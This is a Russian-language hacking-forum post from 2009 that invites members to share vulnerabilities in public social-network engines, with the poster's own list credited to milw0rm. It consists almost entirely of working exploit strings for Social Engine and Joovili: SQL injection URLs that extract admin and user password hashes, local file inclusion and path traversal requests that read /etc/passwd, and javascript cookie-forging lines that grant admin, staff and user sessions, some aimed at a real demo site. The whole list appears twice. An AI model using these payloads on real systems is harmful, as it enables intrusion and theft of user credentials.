FraiDex
23.01.2009, 00:25
Предлагаю в этой теме выкладывать уязвимости в паблик движках для Социальных сетей. Вот парочка от меня:
Social Engine
Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins
Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00
Joovili
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"
Joovili <= 3.0 Multiple SQL Injection Vulnerabilities
http://localhost/[installdir]/search.php
Search Music:
Exploit 1:
'+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8+from+joovili_users/*
Exploit 2:
'+union+select+1,2,3,concat_ws(0x3a,admin_username ,admin_password),5,6,7,8+from+joovili_admins/*
Exploit 1:
http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,username,password),user(),version(),6+from+joovil i_users/*
Exploit 2:
http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,admin_username,admin_password),user(),version(),6 +from+joovili_admins/*
Exploit 1:
http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,username,password),4,5,6,7,8,9,10,11,12,13,14,15 +from+joovili_users/*
Exploit 2:
http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,admin_username,admin_password),4,5,6,7,8,9,10,11 ,12,13,14,15+from+joovili_admins/*
http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6, 7,8,9/*
http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5 ,6,7,8/*
http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5, 6,7/*
http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6, 7,8/*
Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability
[<>] Explo!t :
[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_passwo rd),5,user(),7,8,9/**/from/**/joovili_admins/*
[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email) ,5,user(),7,8,9/**/from/**/joovili_users/*
Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
(с) milw0rm.com
Social Engine
Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins
Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00
Joovili
Joovili 3.1.4 Insecure Cookie Handling Vulnerability
demo admin login:
http://demo.joovili.com/admin
demo user login:
http://demo.joovili.com/
demo staff login:
http://demo.joovili.com/staff/
exploit for user:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
for demo user:
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";
for demo admin:
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";
for demo staff:
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"
Joovili <= 3.0 Multiple SQL Injection Vulnerabilities
http://localhost/[installdir]/search.php
Search Music:
Exploit 1:
'+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8+from+joovili_users/*
Exploit 2:
'+union+select+1,2,3,concat_ws(0x3a,admin_username ,admin_password),5,6,7,8+from+joovili_admins/*
Exploit 1:
http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,username,password),user(),version(),6+from+joovil i_users/*
Exploit 2:
http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,admin_username,admin_password),user(),version(),6 +from+joovili_admins/*
Exploit 1:
http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,username,password),4,5,6,7,8,9,10,11,12,13,14,15 +from+joovili_users/*
Exploit 2:
http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,admin_username,admin_password),4,5,6,7,8,9,10,11 ,12,13,14,15+from+joovili_admins/*
http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6, 7,8,9/*
http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5 ,6,7,8/*
http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5, 6,7/*
http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6, 7,8/*
Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability
[<>] Explo!t :
[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_passwo rd),5,user(),7,8,9/**/from/**/joovili_admins/*
[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email) ,5,user(),7,8,9/**/from/**/joovili_users/*
Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
(с) milw0rm.com